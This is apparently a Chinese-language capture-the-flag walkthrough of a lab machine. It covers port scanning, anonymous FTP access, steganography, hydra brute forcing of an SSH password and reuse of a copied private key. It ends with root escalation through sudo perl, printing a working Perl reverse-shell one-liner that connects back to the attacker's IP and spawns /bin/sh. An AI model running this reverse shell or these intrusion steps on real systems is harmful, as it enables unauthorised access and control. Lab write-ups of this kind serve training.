靶机IP:192.168.92.129 kali攻击机IP:192.168.92.128
一、网络扫描
1)Kali扫描靶机端口,发现靶机开放21、22、80端口
2)查看靶机开放服务
3)使用nmap默认脚本测试,发现ftp可以匿名登录
二、FTP信息收集
匿名登录FTP服务器,用户名和密码都为Anonymous,并下载图片到本地
三、Web信息收集
1)浏览器打开http://192.168.92.129,查看页面,并没有有用信息
2)对网站http://192.168.92.129进行目录扫描,发现一个blogs目录
3)浏览器查看http://192.168.92.129/blogs
进入开发者模式,发现一个S3cr3t-T3xt目录
4)浏览器查看http://192.168.92.129/S3cr3t-T3xt
页面显示密钥 3xtr4ctd4t4
四、隐藏图片信息收集
1)查看图片字符串信息,发现头部有明显异常
2)查看、提取隐写信息,提取密码为web页面获取的3xtr4ctd4t4
3)查看data.txt
根据内容可知,有一个renu用户,且存在弱口令
五、SSH密码爆破
1)准备爆破字典
2)使用hydra爆破,发现renu登录密码:987654321
3)使用renu用户SSH登录靶机
六、获取Flag1-renu用户
七、renu用户信息收集
1)使用history命令,查看renu用户历史操作,发现renu用户复制了lily用户的ssh私钥
八、获取Flag2—lily用户
方法一:
方法二:
九、lily用户信息收集
1)发现lily用户有sudo perl执行权限
十、Perl反弹shell
1)kali主机nc监听5555端口
2)perl反弹shell
sudo perl -e 'use Socket;$i="192.168.92.128";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
十一、获取Flag3-root用户